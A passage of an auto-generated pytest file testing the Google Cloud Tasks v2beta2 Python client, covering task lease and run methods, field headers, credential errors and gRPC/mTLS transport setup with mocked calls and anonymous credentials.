name="name_value", schedule_time=timestamp_pb2.Timestamp(seconds=751),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
assert TimestampRule().to_proto(
args[0].schedule_time
) == timestamp_pb2.Timestamp(seconds=751)
def test_acknowledge_task_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.acknowledge_task(
cloudtasks.AcknowledgeTaskRequest(),
name="name_value",
schedule_time=timestamp_pb2.Timestamp(seconds=751),
)
@pytest.mark.asyncio
async def test_acknowledge_task_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.acknowledge_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.acknowledge_task(
name="name_value", schedule_time=timestamp_pb2.Timestamp(seconds=751),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
assert TimestampRule().to_proto(
args[0].schedule_time
) == timestamp_pb2.Timestamp(seconds=751)
@pytest.mark.asyncio
async def test_acknowledge_task_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.acknowledge_task(
cloudtasks.AcknowledgeTaskRequest(),
name="name_value",
schedule_time=timestamp_pb2.Timestamp(seconds=751),
)
@pytest.mark.parametrize("request_type", [cloudtasks.RenewLeaseRequest, dict,])
def test_renew_lease(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.renew_lease), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task(
name="name_value",
view=task.Task.View.BASIC,
app_engine_http_request=target.AppEngineHttpRequest(
http_method=target.HttpMethod.POST
),
)
response = client.renew_lease(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.RenewLeaseRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, task.Task)
assert response.name == "name_value"
assert response.view == task.Task.View.BASIC
def test_renew_lease_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.renew_lease), "__call__") as call:
client.renew_lease()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.RenewLeaseRequest()
@pytest.mark.asyncio
async def test_renew_lease_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.RenewLeaseRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.renew_lease), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
task.Task(name="name_value", view=task.Task.View.BASIC,)
)
response = await client.renew_lease(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.RenewLeaseRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, task.Task)
assert response.name == "name_value"
assert response.view == task.Task.View.BASIC
@pytest.mark.asyncio
async def test_renew_lease_async_from_dict():
await test_renew_lease_async(request_type=dict)
def test_renew_lease_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.RenewLeaseRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.renew_lease), "__call__") as call:
call.return_value = task.Task()
client.renew_lease(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_renew_lease_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.RenewLeaseRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.renew_lease), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(task.Task())
await client.renew_lease(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_renew_lease_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.renew_lease), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.renew_lease(
name="name_value",
schedule_time=timestamp_pb2.Timestamp(seconds=751),
lease_duration=duration_pb2.Duration(seconds=751),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
assert TimestampRule().to_proto(
args[0].schedule_time
) == timestamp_pb2.Timestamp(seconds=751)
assert DurationRule().to_proto(args[0].lease_duration) == duration_pb2.Duration(
seconds=751
)
def test_renew_lease_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.renew_lease(
cloudtasks.RenewLeaseRequest(),
name="name_value",
schedule_time=timestamp_pb2.Timestamp(seconds=751),
lease_duration=duration_pb2.Duration(seconds=751),
)
@pytest.mark.asyncio
async def test_renew_lease_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.renew_lease), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(task.Task())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.renew_lease(
name="name_value",
schedule_time=timestamp_pb2.Timestamp(seconds=751),
lease_duration=duration_pb2.Duration(seconds=751),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
assert TimestampRule().to_proto(
args[0].schedule_time
) == timestamp_pb2.Timestamp(seconds=751)
assert DurationRule().to_proto(args[0].lease_duration) == duration_pb2.Duration(
seconds=751
)
@pytest.mark.asyncio
async def test_renew_lease_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.renew_lease(
cloudtasks.RenewLeaseRequest(),
name="name_value",
schedule_time=timestamp_pb2.Timestamp(seconds=751),
lease_duration=duration_pb2.Duration(seconds=751),
)
@pytest.mark.parametrize("request_type", [cloudtasks.CancelLeaseRequest, dict,])
def test_cancel_lease(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.cancel_lease), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task(
name="name_value",
view=task.Task.View.BASIC,
app_engine_http_request=target.AppEngineHttpRequest(
http_method=target.HttpMethod.POST
),
)
response = client.cancel_lease(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.CancelLeaseRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, task.Task)
assert response.name == "name_value"
assert response.view == task.Task.View.BASIC
def test_cancel_lease_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.cancel_lease), "__call__") as call:
client.cancel_lease()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.CancelLeaseRequest()
@pytest.mark.asyncio
async def test_cancel_lease_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.CancelLeaseRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.cancel_lease), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
task.Task(name="name_value", view=task.Task.View.BASIC,)
)
response = await client.cancel_lease(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.CancelLeaseRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, task.Task)
assert response.name == "name_value"
assert response.view == task.Task.View.BASIC
@pytest.mark.asyncio
async def test_cancel_lease_async_from_dict():
await test_cancel_lease_async(request_type=dict)
def test_cancel_lease_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.CancelLeaseRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.cancel_lease), "__call__") as call:
call.return_value = task.Task()
client.cancel_lease(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_cancel_lease_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.CancelLeaseRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.cancel_lease), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(task.Task())
await client.cancel_lease(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_cancel_lease_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.cancel_lease), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.cancel_lease(
name="name_value", schedule_time=timestamp_pb2.Timestamp(seconds=751),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
assert TimestampRule().to_proto(
args[0].schedule_time
) == timestamp_pb2.Timestamp(seconds=751)
def test_cancel_lease_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.cancel_lease(
cloudtasks.CancelLeaseRequest(),
name="name_value",
schedule_time=timestamp_pb2.Timestamp(seconds=751),
)
@pytest.mark.asyncio
async def test_cancel_lease_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.cancel_lease), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(task.Task())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.cancel_lease(
name="name_value", schedule_time=timestamp_pb2.Timestamp(seconds=751),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
assert TimestampRule().to_proto(
args[0].schedule_time
) == timestamp_pb2.Timestamp(seconds=751)
@pytest.mark.asyncio
async def test_cancel_lease_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.cancel_lease(
cloudtasks.CancelLeaseRequest(),
name="name_value",
schedule_time=timestamp_pb2.Timestamp(seconds=751),
)
@pytest.mark.parametrize("request_type", [cloudtasks.RunTaskRequest, dict,])
def test_run_task(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.run_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task(
name="name_value",
view=task.Task.View.BASIC,
app_engine_http_request=target.AppEngineHttpRequest(
http_method=target.HttpMethod.POST
),
)
response = client.run_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.RunTaskRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, task.Task)
assert response.name == "name_value"
assert response.view == task.Task.View.BASIC
def test_run_task_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.run_task), "__call__") as call:
client.run_task()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.RunTaskRequest()
@pytest.mark.asyncio
async def test_run_task_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.RunTaskRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.run_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
task.Task(name="name_value", view=task.Task.View.BASIC,)
)
response = await client.run_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.RunTaskRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, task.Task)
assert response.name == "name_value"
assert response.view == task.Task.View.BASIC
@pytest.mark.asyncio
async def test_run_task_async_from_dict():
await test_run_task_async(request_type=dict)
def test_run_task_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.RunTaskRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.run_task), "__call__") as call:
call.return_value = task.Task()
client.run_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_run_task_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.RunTaskRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.run_task), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(task.Task())
await client.run_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_run_task_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.run_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.run_task(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_run_task_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.run_task(
cloudtasks.RunTaskRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_run_task_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.run_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(task.Task())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.run_task(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_run_task_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.run_task(
cloudtasks.RunTaskRequest(), name="name_value",
)
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.CloudTasksGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# It is an error to provide a credentials file and a transport instance.
transport = transports.CloudTasksGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = CloudTasksClient(
client_options={"credentials_file": "credentials.json"},
transport=transport,
)
# It is an error to provide an api_key and a transport instance.
transport = transports.CloudTasksGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
options = client_options.ClientOptions()
options.api_key = "api_key"
with pytest.raises(ValueError):
client = CloudTasksClient(client_options=options, transport=transport,)
# It is an error to provide an api_key and a credential.
options = mock.Mock()
options.api_key = "api_key"
with pytest.raises(ValueError):
client = CloudTasksClient(
client_options=options, credentials=ga_credentials.AnonymousCredentials()
)
# It is an error to provide scopes and a transport instance.
transport = transports.CloudTasksGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = CloudTasksClient(
client_options={"scopes": ["1", "2"]}, transport=transport,
)
def test_transport_instance():
# A client may be instantiated with a custom transport instance.
transport = transports.CloudTasksGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
client = CloudTasksClient(transport=transport)
assert client.transport is transport
def test_transport_get_channel():
# A client may be instantiated with a custom transport instance.
transport = transports.CloudTasksGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
transport = transports.CloudTasksGrpcAsyncIOTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
@pytest.mark.parametrize(
"transport_class",
[transports.CloudTasksGrpcTransport, transports.CloudTasksGrpcAsyncIOTransport,],
)
def test_transport_adc(transport_class):
# Test default credentials are used if not provided.
with mock.patch.object(google.auth, "default") as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class()
adc.assert_called_once()
def test_transport_grpc_default():
# A client should use the gRPC transport by default.
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
assert isinstance(client.transport, transports.CloudTasksGrpcTransport,)
def test_cloud_tasks_base_transport_error():
# Passing both a credentials object and credentials_file should raise an error
with pytest.raises(core_exceptions.DuplicateCredentialArgs):
transport = transports.CloudTasksTransport(
credentials=ga_credentials.AnonymousCredentials(),
credentials_file="credentials.json",
)
def test_cloud_tasks_base_transport():
# Instantiate the base transport.
with mock.patch(
"google.cloud.tasks_v2beta2.services.cloud_tasks.transports.CloudTasksTransport.__init__"
) as Transport:
Transport.return_value = None
transport = transports.CloudTasksTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = (
"list_queues",
"get_queue",
"create_queue",
"update_queue",
"delete_queue",
"purge_queue",
"pause_queue",
"resume_queue",
"get_iam_policy",
"set_iam_policy",
"test_iam_permissions",
"list_tasks",
"get_task",
"create_task",
"delete_task",
"lease_tasks",
"acknowledge_task",
"renew_lease",
"cancel_lease",
"run_task",
)
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
with pytest.raises(NotImplementedError):
transport.close()
def test_cloud_tasks_base_transport_with_credentials_file():
# Instantiate the base transport with a credentials file
with mock.patch.object(
google.auth, "load_credentials_from_file", autospec=True
) as load_creds, mock.patch(
"google.cloud.tasks_v2beta2.services.cloud_tasks.transports.CloudTasksTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.CloudTasksTransport(
credentials_file="credentials.json", quota_project_id="octopus",
)
load_creds.assert_called_once_with(
"credentials.json",
scopes=None,
default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
quota_project_id="octopus",
)
def test_cloud_tasks_base_transport_with_adc():
# Test the default credentials are used if credentials and credentials_file are None.
with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch(
"google.cloud.tasks_v2beta2.services.cloud_tasks.transports.CloudTasksTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.CloudTasksTransport()
adc.assert_called_once()
def test_cloud_tasks_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
CloudTasksClient()
adc.assert_called_once_with(
scopes=None,
default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
quota_project_id=None,
)
@pytest.mark.parametrize(
"transport_class",
[transports.CloudTasksGrpcTransport, transports.CloudTasksGrpcAsyncIOTransport,],
)
def test_cloud_tasks_transport_auth_adc(transport_class):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class(quota_project_id="octopus", scopes=["1", "2"])
adc.assert_called_once_with(
scopes=["1", "2"],
default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
quota_project_id="octopus",
)
@pytest.mark.parametrize(
"transport_class,grpc_helpers",
[
(transports.CloudTasksGrpcTransport, grpc_helpers),
(transports.CloudTasksGrpcAsyncIOTransport, grpc_helpers_async),
],
)
def test_cloud_tasks_transport_create_channel(transport_class, grpc_helpers):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(
google.auth, "default", autospec=True
) as adc, mock.patch.object(
grpc_helpers, "create_channel", autospec=True
) as create_channel:
creds = ga_credentials.AnonymousCredentials()
adc.return_value = (creds, None)
transport_class(quota_project_id="octopus", scopes=["1", "2"])
create_channel.assert_called_with(
"cloudtasks.googleapis.com:443",
credentials=creds,
credentials_file=None,
quota_project_id="octopus",
default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
scopes=["1", "2"],
default_host="cloudtasks.googleapis.com",
ssl_credentials=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
@pytest.mark.parametrize(
"transport_class",
[transports.CloudTasksGrpcTransport, transports.CloudTasksGrpcAsyncIOTransport],
)
def test_cloud_tasks_grpc_transport_client_cert_source_for_mtls(transport_class):
cred = ga_credentials.AnonymousCredentials()
# Check ssl_channel_credentials is used if provided.
with mock.patch.object(transport_class, "create_channel") as mock_create_channel:
mock_ssl_channel_creds = mock.Mock()
transport_class(
host="squid.clam.whelk",
credentials=cred,
ssl_channel_credentials=mock_ssl_channel_creds,
)
mock_create_channel.assert_called_once_with(
"squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_channel_creds,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Check if ssl_channel_credentials is not provided, then client_cert_source_for_mtls
# is used.
with mock.patch.object(transport_class, "create_channel", return_value=mock.Mock()):
with mock.patch("grpc.ssl_channel_credentials") as mock_ssl_cred:
transport_class(
credentials=cred,
client_cert_source_for_mtls=client_cert_source_callback,
)
expected_cert, expected_key = client_cert_source_callback()
mock_ssl_cred.assert_called_once_with(
certificate_chain=expected_cert, private_key=expected_key
)
def test_cloud_tasks_host_no_port():
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="cloudtasks.googleapis.com"
),
)
assert client.transport._host == "cloudtasks.googleapis.com:443"
def test_cloud_tasks_host_with_port():
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="cloudtasks.googleapis.com:8000"
),
)
assert client.transport._host == "cloudtasks.googleapis.com:8000"
def test_cloud_tasks_grpc_transport_channel():
channel = grpc.secure_channel("http://localhost/", grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.CloudTasksGrpcTransport(
host="squid.clam.whelk", channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert transport._ssl_channel_credentials == None
def test_cloud_tasks_grpc_asyncio_transport_channel():
channel = aio.secure_channel("http://localhost/", grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.CloudTasksGrpcAsyncIOTransport(
host="squid.clam.whelk", channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert transport._ssl_channel_credentials == None
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize(
"transport_class",
[transports.CloudTasksGrpcTransport, transports.CloudTasksGrpcAsyncIOTransport],
)
def test_cloud_tasks_transport_channel_mtls_with_client_cert_source(transport_class):
with mock.patch(
"grpc.ssl_channel_credentials", autospec=True
) as grpc_ssl_channel_cred:
with mock.patch.object(
transport_class, "create_channel"
) as grpc_create_channel:
mock_ssl_cred = mock.Mock()
grpc_ssl_channel_cred.return_value = mock_ssl_cred
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
cred = ga_credentials.AnonymousCredentials()
with pytest.warns(DeprecationWarning):
with mock.patch.object(google.auth, "default") as adc:
adc.return_value = (cred, None)
transport = transport_class(
host="squid.clam.whelk",
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=client_cert_source_callback,
)
adc.assert_called_once()
grpc_ssl_channel_cred.assert_called_once_with(
certificate_chain=b"cert bytes", private_key=b"key bytes"
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
assert transport._ssl_channel_credentials == mock_ssl_cred
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize(
"transport_class",
[transports.CloudTasksGrpcTransport, transports.CloudTasksGrpcAsyncIOTransport],
)
def test_cloud_tasks_transport_channel_mtls_with_adc(transport_class):
mock_ssl_cred = mock.Mock()
with mock.patch.multiple(
"google.auth.transport.grpc.SslCredentials",
__init__=mock.Mock(return_value=None),
ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
):
with mock.patch.object(
transport_class, "create_channel"
